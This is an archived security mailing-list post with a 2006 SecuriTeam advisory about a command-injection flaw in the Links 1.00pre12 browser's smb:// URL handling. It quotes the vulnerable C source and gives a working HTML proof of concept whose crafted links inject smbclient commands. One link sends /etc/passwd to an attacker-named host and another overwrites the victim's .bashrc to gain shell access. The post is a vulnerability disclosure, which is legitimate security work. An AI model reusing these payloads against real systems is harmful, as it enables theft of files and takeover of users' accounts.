Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[EXPL] Links 1.00pre12 smbclient Code Execution (PoC)

from [SecuriTeam] Network Security [Permanent Link]
Subject: [EXPL] Links 1.00pre12 smbclient Code Execution (PoC)
Date: 15 Nov 2006 19:03:28 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Links 1.00pre12 smbclient Code Execution (PoC)
------------------------------------------------------------------------


SUMMARY

There is a flaw in the Links web browser, that allows malicious web sites 
to execute smbclient commands on the victim's machine.

DETAILS

Description:
There is a flaw in the Links web browser, that allows malicious web sites 
to execute smbclient commands on the victim's machine.
This flaw makes it possible to read any file from the victim system (any 
file that the user running links has read access), or to upload any file 
to the victim system (any file that the user running links can 
create/overwrite).  The attacker could, for example, upload ~/.bashrc to 
gain shell access.

Vulnerable Systems:
 * Ubuntu 6.06 LTS and Links 1.00pre12. Smbclient must also be installed. 
(tested on)

Vulnerable code:
smb_func() in smb.c:
   ...
   143                 if (*share) {
   144                         if (!*dir || dir[strlen(dir) - 1] == '/'
|| dir[strlen(dir) - 1] == '\\') {
   145                                 if (dir) {
   146                                         v[n++] = "-D";
   147                                         v[n++] = dir;
   148                                 }
   149                                 v[n++] = "-c";
   150                                 v[n++] = "ls";
   151                         } else {
   152                                 unsigned char *ss;
   153                                 unsigned char *s = stracpy("get
\"");
'dir' is the directory part of the smb://.. url:
   154                                 add_to_strn(&s, dir);
   155                                 add_to_strn(&s, "\" -");
   156                                 while ((ss = strchr(s, '/')))
*ss = '\\';
   157                                 v[n++] = "-c";
   158                                 v[n++] = s;
   159                         }
   160                 }
   161                 v[n++] = NULL;
smbclient is executed:
   162                 execvp("smbclient", (char **)v);
   163                 fprintf(stderr, "smbclient not found in $PATH");
   164                 _exit(1);
   ...
-->
<html>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd
etc; put passwd ; exit; '>Put /etc/passwd</a>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd
home; lcd teemu; get HOHO .bashrc; exit; '>Get .bashrc</a>
</html>


ADDITIONAL INFORMATION

The information has been provided by  <http://www.milw0rm.com> milw0rm.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Links 1.00pre12 smbclient Code Execution (PoC), SecuriTeam <=
Previous by Date:  [EXPL] Broadcom Wireless Driver Probe Response SSID Overflow, SecuriTeam
Next by Date:  [Full-disclosure] NetBSD all versions FireWire IOCTL kernel integer overflow information disclousure, Rodrigo Rubira Branco (BSDaemon)
Previous by Thread:  [EXPL] Broadcom Wireless Driver Probe Response SSID Overflow, SecuriTeam
Next by Thread:  [Full-disclosure] NetBSD all versions FireWire IOCTL kernel integer overflow information disclousure, Rodrigo Rubira Branco (BSDaemon)
Indexes:  [Date] [Thread] [Top] [All Lists]